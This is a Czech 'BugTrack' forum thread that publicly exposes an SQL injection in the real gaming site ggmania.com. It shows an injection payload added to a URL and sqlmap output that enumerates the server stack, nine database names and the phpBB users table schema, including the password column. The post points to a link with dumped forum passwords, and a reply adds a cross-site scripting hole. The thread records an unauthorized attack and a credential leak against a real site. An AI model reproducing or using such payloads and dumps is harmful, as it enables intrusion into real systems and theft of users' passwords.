ggmania.com - SQLi

BugTrack

ggmania.com - SQLi #
Jedna se o SQLi, shodnych hesel je z databazi vsude po internetu dost :)

[link] OR 17-7=10

>> sqlmap <<
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] the SQL query used returns 9 entries
[INFO] resumed: information_schema
[INFO] resumed: box
[INFO] resumed: gameguru
[INFO] resumed: games
[INFO] resumed: ggforum
[INFO] resumed: mts
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: wall

--

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5
Database: ggforum
Table: phpbb_users
[28 columns]
+-----------------------+------------------
-----+
| Column | Type |
+-----------------------+------------------
-----+
| user_active | tinyint(1) |
| user_allow_pm | tinyint(1) |
| user_allow_viewonline | tinyint(1) |
| user_allowavatar | tinyint(1) |
| user_allowbbcode | tinyint(1) |
| user_allowhtml | tinyint(1) |
| user_allowsmile | tinyint(1) |
| user_attachsig | tinyint(1) |
| user_dateformat | varchar(14) |
| user_emailtime | int(11) |
| user_id | mediumint(8) |
| user_lang | varchar(255) |
| user_last_privmsg | int(11) |
| user_lastvisit | int(11) |
| user_level | tinyint(4) |
| user_new_privmsg | smallint(5) unsigned |
| user_notify | tinyint(1) |
| user_notify_pm | tinyint(1) |
| user_password | varchar(32) |
| user_posts | mediumint(8) unsigned |
| user_regdate | int(11) |
| user_session_page | smallint(5) |
| user_session_time | int(11) |
| user_style | tinyint(4) |
| user_timezone | decimal(5,2) |
| user_unread_privmsg | smallint(5) unsigned |
| user_viewemail | tinyint(1) |
| username | varchar(25) |
+-----------------------+------------------
-----+

Hesla z db ggforum: [link]


(odpovědět)
Mikina | 209.159.138.*20.11.2014 21:49
re: ggmania.com - SQLi #
+ xss v url [link]
(odpovědět)
troto | E-mail21.11.2014 1:01
re: ggmania.com - SQLi #
[link]

----------
Existuje 10 druhů lidí. Ti, co znaj binár a ti, co ne...
(odpovědět)
r0v1 | E-mail | Website23.11.2014 1:53

Zpět
 
 
 

 
BBCode